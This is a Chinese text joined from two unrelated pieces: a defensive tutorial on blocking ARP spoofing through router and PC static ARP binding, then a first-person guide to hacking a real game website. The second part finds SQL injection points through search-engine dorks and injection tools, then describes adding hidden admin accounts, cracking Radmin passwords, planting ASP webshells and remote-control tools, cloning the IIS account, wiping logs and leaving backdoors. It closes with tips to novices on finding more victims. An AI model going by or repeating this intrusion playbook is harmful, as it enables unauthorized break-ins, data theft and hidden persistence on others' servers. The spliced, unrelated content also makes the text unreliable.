从影响网络连接通畅的方式来看，ARP欺骗有两种攻击可能，一种是对路由器ARP表的欺骗；另一种是对内网电脑ARP表的欺骗，当然也可能两种攻击同时进行。不管理怎么样，欺骗发送后，电脑和路由器之间发送的数据可能就被送到错误的MAC地址上，从表面上来看，就是“上不了网”，“访问不了路由器”，“路由器死机了”，因为一重启路由器，ARP表会重建，如果ARP攻击不是一直存在，就会表现为网络正常，所以网吧业主会更加确定是路由器“死机”了，而不会想到其他原因。为此，宽带路由器背了不少“黑锅”，但实际上应该ARP协议本身的问题。好了，其他话就不多说，让我们来看看如何来防止ARP的欺骗吧。

上面也已经说了，欺骗形式有欺骗路由器ARP表和欺骗电脑ARP两种，我们的防护当然也是两个方面的，首先在路由器上进行设置，来防止路由器的ARP表被恶意的ARP数据包更改；其次，我们也会在电脑上进行一下设置，来防止电脑的ARP表受恶意更改。两个方面的设置都是必须的，不然，如果您只设置了路由器的防止ARP欺骗功能而没有设置电脑，电脑被欺骗后就不会把数据包发送到路由器上，而是发送到一个错误的地方，当然无法上网和访问路由器了。

一、设置前准备

当使用了防止ARP欺骗功能（IP和MAC绑定功能）后，最好是不要使用动态IP，因为电脑可能获取到和IP与MAC绑定条目不同的IP，这时候可能会无法上网，通过下面的步骤来避免这一情况发生吧。

1.把路由器的DHCP功能关闭：打开路由器管理界面，“DHCP服务器”－＞“DHCP服务”，把状态由默认的“启用”更改为“不启用”，保存并重启路由器。

2.给电脑手工指定IP地址、网关、DNS服务器地址，如果您不是很清楚当地的DNS地址，可以咨询您的网络服务商。

二、设置路由器防止ARP欺骗

打开路由器的管理界面可以看到如下的左侧窗口：

可以看到比之前的版本多出了“IP与MAC绑定”的功能，这个功能除了可以实现IP和MAC绑定外，还可以实现防止ARP欺骗功能。

打开“静态ARP绑定设置”窗口如下：

注意，默认情况下ARP绑定功能是关闭，请选中启用后，点击保存来启用。

打开“ARP映射表”窗口如下：

这是路由器动态学习到的ARP表，可以看到状态这一栏显示为“未绑定”。如果确认这一个动态学习的表没有错误（如果网络是正常运行的，而且不同IP对应的MAC不一样，一般就没有错误）。我们把这一个表进行绑定，并且保存为静态表，这样路由器重启后这些条目都会存在，达到一劳永逸的效果。

点击“全部绑定”，可以看到下面界面：

可以看到状态中已经为已绑定，这时候，路由器已经具备了防止ARP欺骗的功能，上面的示范中只有三个条目，如果您的电脑多，操作过程也是类似的。有些条目如果没有添加，也可以下次补充上去。除了这种利用动态学习到的ARP表来导入外，也可以使用手工添加的方式，只要知道电脑的MAC地址，手工添加相应条目就可。

为了让下一次路由器重新启动后这些条目仍然存在，我们点击了“全部导入”，然后再次打开“静态ARP绑定设置”窗口：

可以看到静态条目已经添加，而且在绑定这一栏已经打上勾，表示启用相应条目的绑定。到此，我们已经成功设置路由器来防止192.168.1.111、192.168.1.112、222.77.77.1这三个IP受ARP欺骗的攻击，如果有更多的电脑，只是条目数不同，设置过程当然是一样的，不是很难吧？

三、设置电脑防止ARP欺骗

路由器已经设置了防止ARP欺骗功能，接下来我们就来设置电脑的防止ARP欺骗了。微软的操作系统中都带有ARP这一命令行程序，我们可以在windows的命令行界面来使用它。打开windows的命令行提示符如下：

通过“arp-s ＋路由器IP如192.168.1.1＋路由器的MAC地址”这一条命令来实现对路由器的ARP条目的静态绑定，可以看到在arp -a 命令的输出中，已经有了我们刚才添加的条目，Type类型为static表示是静态添加的。至此，我们也已经设置了电脑的静态ARP条目，这样电脑发送到路由器的数据包就不会发送到错误的地方去了。

怎么知道路由器的MAC地址是多少呢？可以打开路由器的管理界面，进入“网络参数”－＞“LAN口设置”：

LAN口的MAC地址就是电脑的网关的MAC地址。

细心的人可能已经发现了，如果使用上面的方法，电脑每次在重启后都需要输入上面的命令来实现防止ARP欺骗，有没有更简单的方法自动来完成，不用手工输入呢？有！

我们可以新建一个批处理文件如static_arp.bat，注意后缀名为bat。编辑它，在里面加入我们刚才的命令：

保存就可以了，以后可以通过双击它来执行这条命令，还可以把它放置到系统的启动目录下来实现启动时自己执行。打开电脑“开始”－＞“程序”，双击“启动”打开启动的文件夹目录，把刚才建立的static_arp.bat复制到里面去：

好了，以后电脑每次启动时就会自己执行arp –s命令了，网吧网管和老板终于可以好好休息一下，不再受到ARP攻击的干扰。
下面是一个软件防止ARP攻击的
下载地址：http://www.onlinedown.net/soft/52718.htm

获取注入点的方法不外乎两种:手工寻找和利用注入工具寻找。对于前者，多数是用搜索引擎来找特定的网址(形如xxx.asp?xxid=)，对于后者，则是针对具体某个站点用注入工具扫描注入点。不过，你有没有考虑过把这两种方法结合起来使用呢?我就倾向于二者的组合使用，方法如下:
　　在阿D注入工具中的“扫描注入点”功能模块的地址栏里输入并转到google的网址，选择“高级搜索”，在搜索结果栏中选择“100项结果”，语言选择“简体中文”，关键字填:xxx inurl:asp或是inurl:XX.asp?id=、inurl:xxx.asp?xxid等，这些都是我们常见的可能存在注入点的网址形式，我输入的是ert inurl:asp(有人说这个关键字容易找到sa权限，不知是真是假，但我确实找到了不少)。点击搜索后，在注入点一栏中马上就会显示出N多的有注入点的网址。

　　在第一页中就显示找到了20几个(20%)，从头开始试，检测一下，是不是sa权限，若不是可先跳过。因为本文讲的是sa权限，所以在这里我们只找有sa权限注入点的网站，以省去菜鸟们在注入时因一些权限问题而导致入侵卡住的情况。也许有人要问了，有那么多sa权限注入点的网站吗?根据我的个人经验，只要你的关键字设的好，每100项中就有20几个(约20%)有注入漏洞的网站，在这些网站中又有5个左右(约5%)是有sa权限的。试想想，只要我们的关键字设的好，google可以搜索到的结果何止是100项，一般的搜索结果都在1万项以上，这样算来，我们的目标就有成百上千呀(小菜高呼:哇!发财了!)，就怕你没有那么多的精力去注入全部的网站，呵呵!我马上就找到了一个(运气好呀，可以去买票了，说不定是头奖呢?呵呵，又一个百万富翁!什么?现在百万富翁不算啥?要不，你给我一百万?!)。将这个网址复制到明小子的domain3.2中进行检测，也确实是sa权限，跟阿D注入工具显示的一样。

　　用domain的命令行功能查看一下开放的端口，发现开放了21、23、80、1433、3389等端口，看来我今天运气的确不错呀!加个账号admin$，但由于管理员已经远程登录3389。

　　看来我暂时不要登录的为好。再看看有没有其它可以利用的东西，用阿D注入工具的目录浏览功能看了一下(个人感觉这方面阿D注入工具要比domain好!明小子怒目圆睁，大叫:你收了阿D多少好处!)忽然眼睛一亮，发现D盘有一个wwwroot目录，并且里面有一个目录和网站名一样。

　　呵呵，好东西呀，向里面写入个asp木马试试，浏览文件也好方便一些。但接下来让我郁闷的是明明提示已经上传成功。

　　但在浏览器中输入它的地址却提示没有该文件，而且到了后来，domain的命令行功能反馈回来的信息也变得非常凌乱，不知道是怎么回事。于是想换个cmdshell，又想起它开了23端口，用telnet连接了一下，发现有ntlm认证。呵呵，老办法，在本地新建一个admin$账号，密码和目标主机上的一样，再用这个账号运行cmd.exe，telnet到目标主机——连接成功，用query user查看了一下终端情况，发现有一个会话处于断开状态，于是我便用3389连接了一下，却提示3389已经达到了最大连接数!我晕，看来有连接数限制，干脆把这个会话结束掉，反正它也断开了，浪费资源!呵呵，输入logoff 2(它的会话ID)，然后用3389登录试试，登录成功。

　　本想入侵到这里就结束的，但看了一下这台主机的配置:P4 3.0，512M内存，我就不禁流口水了，这样的主机放过了就可惜了，是极品呀，于是就又有了下文的一些曲折!

　　用3389进来后，本想在上面安装Radmin，但发现程序菜单里已经有了，看来是管理员远程控制用的，此路显然是不通了。突然想起Radmin的密码文件是存在注册表里的，虽然是加了密的，但现在已经有了Radmin密码的暴力破解工具，把它在注册表中的密码键值读取出来保存到一个临时文件。

　　然后编辑这个文件，直接通过3389复制粘贴到本地，用破解软件跑了半天，没有结果，看来管理员设的Radmin密码也不弱智呀!

　　算了，再找别的思路吧!在上面装个rmtsvc?这也是远程控制软件中的精品呀!怎么上传呢，在本地开个FTP，然后通过3389打开一个cmd进行登录，发现半天没有反应，它上面有Serv-U，加个账号再在本地连接试试，也是没反应!毕竟是个人气还挺旺的游戏网站嘛，连接的人太多，看来是网速受影响了!没办法，前面不是有个1433端口开放了吗?呵呵，不是还知道它的网站文件所在的目录了吗?找数据库连接文件呗——地球人都知道!我找呀找呀找呀找，找到一个好朋友:connin.asp，打开看了看，密码就乖乖地躺在里面呢。

　　马上用SQLTools连接上，发现一点击上传文件后，也是就卡住了，看来网速的确是受影响了，总不能为了让网络流量小一点，就让我把目标主机强行重启吧?我可是有点怕怕呀，呵呵!怎么办呢?

　　正当无奈之际，突然看到了桌面上的IE浏览器，于是灵光一闪，真是山重水复疑无路，柳暗花明又一村，终于找到救星了!马上用它从网上下载了一个rmtsvc装上。呵呵，终于成功安装!整了半天，我咋就没想到利用IE直接上网去下载呢?

　　到这，我已经完全控制了这台主机。不过，为了保险起见，通过3389，我把海洋2006木马的代码复制过去，保存, 在网站目录下，并且，我发现该网站有Dvbbs论坛，于是我用前面找到的数据库连接密码，用MSSQL Server的查询分析器连上去，读取出后台管理密码，可惜是经过加密了的，有总比没有好。

　　然后克隆IIS的默认账号为管理员。这样，就安全多了，呵呵，万一肉鸡丢了，还可以再找回来。由于在上面操作过程中下载过东西，把IE的记录全删掉，同时处理一下日志，闪人!

　　总结:

　　1.刚开始学注入的小菜们，大多是通过搜索引擎漫无边际地找注入点，比较费力!本文的阿D注入工具配合Google搜索引擎批量找注入点可以节省不少的时间，而且也很容易找到有sa权限注入点的网站，毕竟搜索引擎找到的结果数量还是相当惊人的，不过在查找关键字上就要多总结技巧，从而最大限度的找到更多的有sa权限注入点的网站!当然，我们也可以用domain来批量检测，不过个人感觉相比阿D注入工具，Domain找到的注入网站要少一点，而且列目录功能也没有阿D注入工具好用。不过，对于命令行功能domain就要略胜一筹了，也可能是我用的阿D注入工具的破解问题或是版本问题吧。因此，在这里，我推荐大家把这两款工具结合起来使用，取二者的长处:通过搜索引擎找有注入点的网站和列目录功能用阿D的注入工具，执行命令功能用domain，这样的工具组合，更能提高我们的入侵效率!

　　2.对于上传文件不一定局限于在本地和目标主机之间传输文件，也可以在目标主机上直接从网上下载文件。像我本文后半部分的入侵就是。

　　3.最后，尽量在肉鸡上多放两个后门，以便肉鸡丢失后找回肉鸡之用。

　　4.对于入侵，最重要的是思路，一个思路不行时，要学会从多方面考虑，这样我们的黑客技术才能提高!

　　5.在找到注入点后，不要习惯性地先去找后台密码，再用后台密码登录上传WebShell去提升权限，要先看看是不是sa权限，因为如果是sa权限的话，我们的权限是很高的，要先试试能不能执行系统级命令如添加管理员账号、开telnet服务等，同时要注意它的3389服务是不是已经开放。从而避免一些不必要的弯路。